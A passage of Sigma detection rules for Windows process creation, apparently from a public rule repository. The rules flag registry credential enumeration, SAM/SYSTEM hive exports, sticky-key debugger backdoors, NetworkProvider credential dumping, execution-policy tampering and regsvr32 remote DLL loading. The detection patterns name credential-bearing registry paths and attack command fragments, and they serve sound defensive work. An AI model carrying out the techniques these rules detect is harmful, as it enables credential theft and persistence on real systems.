    "content": "title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location\nid: cc368ed0-2411-45dc-a222-510ace303cb2\nrelated:\n    - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location\nreferences:\n    - https://www.fortiguard.com/threat-signal-report/4718?s=09\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-25\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\Regsvcs.exe'\n              - '\\Regasm.exe'\n        - OriginalFileName:\n              - 'RegSvcs.exe'\n              - 'RegAsm.exe'\n    selection_dir:\n        CommandLine|contains:\n            # Note: Add more potentially suspicious directories\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            # - '\\Desktop\\'\n            # - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml",
    "content": "title: Exports Critical Registry Keys To a File\nid: 82880171-b475-4201-b811-e9c826cd5eaa\nrelated:\n    - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a\n      type: similar\nstatus: test\ndescription: Detects the export of a crital Registry key to a file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli_1:\n        CommandLine|contains|windash: ' -E '\n    selection_cli_2:\n        CommandLine|contains:\n            - 'hklm'\n            - 'hkey_local_machine'\n    selection_cli_3:\n        CommandLine|endswith:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n    condition: all of selection_*\nfalsepositives:\n    - Dumping hives for legitimate purpouse i.e. backup or forensic investigation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml",
    "content": "title: Exports Registry Key To a File\nid: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a\nrelated:\n    - id: 82880171-b475-4201-b811-e9c826cd5eaa\n      type: similar\nstatus: test\ndescription: Detects the export of the target Registry key to a file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains|windash: ' -E '\n    filter_1:   # filters to avoid intersection with critical keys rule\n        CommandLine|contains:\n            - 'hklm'\n            - 'hkey_local_machine'\n    filter_2:\n        CommandLine|endswith:\n            - '\\system'\n            - '\\sam'\n            - '\\security'\n    condition: all of selection_* and not all of filter_*\nfalsepositives:\n    - Legitimate export of keys\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml",
    "content": "title: Imports Registry Key From a File\nid: 73bba97f-a82d-42ce-b315-9182e76c57b1\nrelated:\n    - id: 0b80ade5-6997-4b1d-99a1-71701778ea61\n      type: similar\nstatus: test\ndescription: Detects the import of the specified file to the registry with regedit.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /i '\n            - ' /s '\n            - '.reg'\n    filter_1:\n        CommandLine|contains|windash:\n            - ' -e '\n            - ' -a '\n            - ' -c '\n    filter_2:\n        CommandLine|re: ':[^ \\\\]'     # to avoid intersection with ADS rule\n    condition: all of selection_* and not all of filter_*\nfalsepositives:\n    - Legitimate import of keys\n    - Evernote\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml",
    "content": "title: Imports Registry Key From an ADS\nid: 0b80ade5-6997-4b1d-99a1-71701778ea61\nrelated:\n    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1\n      type: similar\nstatus: test\ndescription: Detects the import of a alternate datastream to the registry with regedit.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regedit.exe'\n        - OriginalFileName: 'REGEDIT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /i '\n            - '.reg'\n        CommandLine|re: ':[^ \\\\]'\n    filter:\n        CommandLine|contains|windash:\n            - ' -e '\n            - ' -a '\n            - ' -c '\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml",
    "content": "title: Regedit as Trusted Installer\nid: 883835a7-df45-43e4-bf1d-4268768afda4\nstatus: test\ndescription: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe\nreferences:\n    - https://twitter.com/1kwpeter/status/1397816101455765504\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n        ParentImage|endswith:\n            - '\\TrustedInstaller.exe'\n            - '\\ProcessHacker.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regini_ads.yml",
    "content": "title: Suspicious Registry Modification From ADS Via Regini.EXE\nid: 77946e79-97f1-45a2-84b4-f37b5c0d8682\nrelated:\n    - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134\n      type: derived\nstatus: test\ndescription: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regini/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nauthor: Eli Salem, Sander Wiebing, oscd.community\ndate: 2020-10-12\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regini.exe'\n        - OriginalFileName: 'REGINI.EXE'\n    selection_re:\n        CommandLine|re: ':[^ \\\\]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regini_execution.yml",
    "content": "title: Registry Modification Via Regini.EXE\nid: 5f60740a-f57b-4e76-82a1-15b6ff2cb134\nrelated:\n    - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682\n      type: derived\nstatus: test\ndescription: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regini/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nauthor: Eli Salem, Sander Wiebing, oscd.community\ndate: 2020-10-08\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\regini.exe'\n        - OriginalFileName: 'REGINI.EXE'\n    filter:\n        CommandLine|re: ':[^ \\\\]' # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate modification of keys\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml",
    "content": "title: DLL Execution Via Register-cimprovider.exe\nid: a2910908-e86f-4687-aeba-76a5f996e652\nstatus: test\ndescription: Detects using register-cimprovider.exe to execute arbitrary dll file.\nreferences:\n    - https://twitter.com/PhilipTsukerman/status/992021361106268161\n    - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\nauthor: Ivan Dyachkov, Yulia Fomina, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\register-cimprovider.exe'\n        CommandLine|contains|all:\n            - '-path'\n            - 'dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml",
    "content": "title: Enumeration for 3rd Party Creds From CLI\nid: 87a476dc-0079-4583-a985-dee7a20a03de\nrelated:\n    - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1\n      type: derived\n    - id: cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\n      type: similar\nstatus: test\ndescription: Detects processes that query known 3rd party registry keys that holds credentials via commandline\nreferences:\n    - https://isc.sans.edu/diary/More+Data+Exfiltration/25698\n    - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt\n    - https://github.com/HyperSine/how-does-MobaXterm-encrypt-password\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: # Add more paths as they are discovered\n            - '\\Software\\Aerofox\\Foxmail\\V3.1'\n            - '\\Software\\Aerofox\\FoxmailPreview'\n            - '\\Software\\DownloadManager\\Passwords'\n            - '\\Software\\FTPWare\\COREFTP\\Sites'\n            - '\\Software\\IncrediMail\\Identities'\n            - '\\Software\\Martin Prikryl\\WinSCP 2\\Sessions'\n            - '\\Software\\Mobatek\\MobaXterm\\'\n            - '\\Software\\OpenSSH\\Agent\\Keys'\n            - '\\Software\\OpenVPN-GUI\\configs'\n            - '\\Software\\ORL\\WinVNC3\\Password'\n            - '\\Software\\Qualcomm\\Eudora\\CommandLine'\n            - '\\Software\\RealVNC\\WinVNC4'\n            - '\\Software\\RimArts\\B2\\Settings'\n            - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n            - '\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\'\n            - '\\Software\\Sota\\FFFTP'\n            - '\\Software\\TightVNC\\Server'\n            - '\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin'\n    filter_main_other_rule:  # matched by cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\n        Image|endswith: 'reg.exe'\n        CommandLine|contains:\n            - 'export'\n            - 'save'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_export_of_thirdparty_creds.yml",
    "content": "title: Registry Export of Third-Party Credentials\nid: cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\nrelated:\n    - id: 87a476dc-0079-4583-a985-dee7a20a03de\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe to export registry paths associated with third-party credentials.\n    Credential stealers have been known to use this technique to extract sensitive information from the registry.\nreferences:\n    - https://www.virustotal.com/gui/file/fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789/behavior\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_save:\n        CommandLine|contains:\n            - 'save'\n            - 'export'\n    selection_cli_path:\n        CommandLine|contains:\n            - '\\Software\\Aerofox\\Foxmail\\V3.1'\n            - '\\Software\\Aerofox\\FoxmailPreview'\n            - '\\Software\\DownloadManager\\Passwords'\n            - '\\Software\\FTPWare\\COREFTP\\Sites'\n            - '\\Software\\IncrediMail\\Identities'\n            - '\\Software\\Martin Prikryl\\WinSCP 2\\Sessions'\n            - '\\Software\\Mobatek\\MobaXterm'\n            - '\\Software\\OpenSSH\\Agent\\Keys'\n            - '\\Software\\OpenVPN-GUI\\configs'\n            - '\\Software\\ORL\\WinVNC3\\Password'\n            - '\\Software\\Qualcomm\\Eudora\\CommandLine'\n            - '\\Software\\RealVNC\\WinVNC4'\n            - '\\Software\\RimArts\\B2\\Settings'\n            - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n            - '\\Software\\SimonTatham\\PuTTY\\SshHostKeys'\n            - '\\Software\\Sota\\FFFTP'\n            - '\\Software\\TightVNC\\Server'\n            - '\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml",
    "content": "title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI\nid: 10344bb3-7f65-46c2-b915-2d00d47be5b0\nrelated:\n    - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\nreferences:\n    - https://twitter.com/M_haggis/status/1699056847154725107\n    - https://twitter.com/JAMESWT_MHT/status/1699042827261391247\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\n    - https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults'\n            - 'http'\n            - ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml",
    "content": "title: Suspicious Debugger Registration Cmdline\nid: ae215552-081e-44c7-805f-be16f975c8a2\nstatus: test\ndescription: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).\nreferences:\n    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-09-06\nmodified: 2022-08-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: '\\CurrentVersion\\Image File Execution Options\\'\n    selection2:\n        CommandLine|contains:\n            - 'sethc.exe'\n            - 'utilman.exe'\n            - 'osk.exe'\n            - 'magnify.exe'\n            - 'narrator.exe'\n            - 'displayswitch.exe'\n            - 'atbroker.exe'\n            - 'HelpPane.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_logon_script.yml",
    "content": "title: Potential Persistence Via Logon Scripts - CommandLine\nid: 21d856f9-9281-4ded-9377-51a1a6e2a432\nrelated:\n    - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458\n      type: derived\nstatus: test\ndescription: Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence\nreferences:\n    - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2023-06-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1037.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'UserInitMprLogonScript'\n    condition: selection\nfalsepositives:\n    - Legitimate addition of Logon Scripts via the command line by administrators or third party tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml",
    "content": "title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI\nid: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77\nrelated:\n    - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701\n      type: similar\nstatus: test\ndescription: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\n    - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-02-02\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Services\\'\n            - '\\NetworkProvider'\n    # filter:\n    #     CommandLine|contains:\n    #         - '\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\P9NP\\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV\n    condition: selection\nfalsepositives:\n    - Other legitimate network providers used and not filtred in this rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml",
    "content": "title: Python Function Execution Security Warning Disabled In Excel\nid: 023c654f-8f16-44d9-bb2b-00ff36a62af9\nrelated:\n    - id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\n    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\nreferences:\n    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327\nauthor: '@Kostastsale'\ndate: 2023-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Microsoft\\Office\\'\n            - '\\Excel\\Security'\n            - 'PythonFunctionWarnings'\n        CommandLine|contains: ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml",
    "content": "title: Potential Privilege Escalation via Service Permissions Weakness\nid: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981\nstatus: test\ndescription: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/\nauthor: Teymur Kheirkhabarov\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n        CommandLine|contains|all:\n            - 'ControlSet'\n            - 'services'\n        CommandLine|contains:\n            - '\\ImagePath'\n            - '\\FailureCommand'\n            - '\\ServiceDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml",
    "content": "title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution\nid: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'SOFTWARE\\Microsoft\\Provisioning\\Commands\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml",
    "content": "title: Potential PowerShell Execution Policy Tampering - ProcCreation\nid: cf2e938e-9a3e-4fe8-a347-411642b28a9f\nrelated:\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine\nreferences:\n    - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_path:\n        CommandLine|contains:\n            - '\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy'\n            - '\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy'\n    selection_values:\n        CommandLine|contains:\n            - 'Bypass'\n            - 'RemoteSigned'\n            - 'Unrestricted'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml",
    "content": "title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine\nid: 9ec9fb1b-e059-4489-9642-f270c207923d\nrelated:\n    - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.\nreferences:\n    - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n    - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n    - https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-05-14\nmodified: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'\n            - 'add'\n            - '/v'\n            - '/d 0'\n    condition: selection\nfalsepositives:\n    - System administrator activities\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml",
    "content": "title: Persistence Via TypedPaths - CommandLine\nid: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba\nstatus: test\ndescription: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt\nreferences:\n    - https://twitter.com/dez_/status/1560101453150257154\n    - https://forensafe.com/blogs/typedpaths.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\ntags:\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml",
    "content": "title: Potential Regsvr32 Commandline Flag Anomaly\nid: b236190c-1c61-41e9-84b3-3fe03f6d76b0\nstatus: test\ndescription: Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.\nreferences:\n    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-07-13\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|windash: ' -i:'\n    filter_main_flag:\n        CommandLine|contains|windash: ' -n '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrator typo might cause some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml",
    "content": "title: Potentially Suspicious Regsvr32 HTTP IP Pattern\nid: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8\nstatus: test\ndescription: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\n    - https://twitter.com/tccontre18/status/1480950986650832903\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_ip:\n        CommandLine|contains:\n            - ' /i:http://1'\n            - ' /i:http://2'\n            - ' /i:http://3'\n            - ' /i:http://4'\n            - ' /i:http://5'\n            - ' /i:http://6'\n            - ' /i:http://7'\n            - ' /i:http://8'\n            - ' /i:http://9'\n            - ' /i:https://1'\n            - ' /i:https://2'\n            - ' /i:https://3'\n            - ' /i:https://4'\n            - ' /i:https://5'\n            - ' /i:https://6'\n            - ' /i:https://7'\n            - ' /i:https://8'\n            - ' /i:https://9'\n            - ' -i:http://1'\n            - ' -i:http://2'\n            - ' -i:http://3'\n            - ' -i:http://4'\n            - ' -i:http://5'\n            - ' -i:http://6'\n            - ' -i:http://7'\n            - ' -i:http://8'\n            - ' -i:http://9'\n            - ' -i:https://1'\n            - ' -i:https://2'\n            - ' -i:https://3'\n            - ' -i:https://4'\n            - ' -i:https://5'\n            - ' -i:https://6'\n            - ' -i:https://7'\n            - ' -i:https://8'\n            - ' -i:https://9'\n    condition: all of selection_*\nfalsepositives:\n    - FQDNs that start with a number such as \"7-Zip\"\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml",
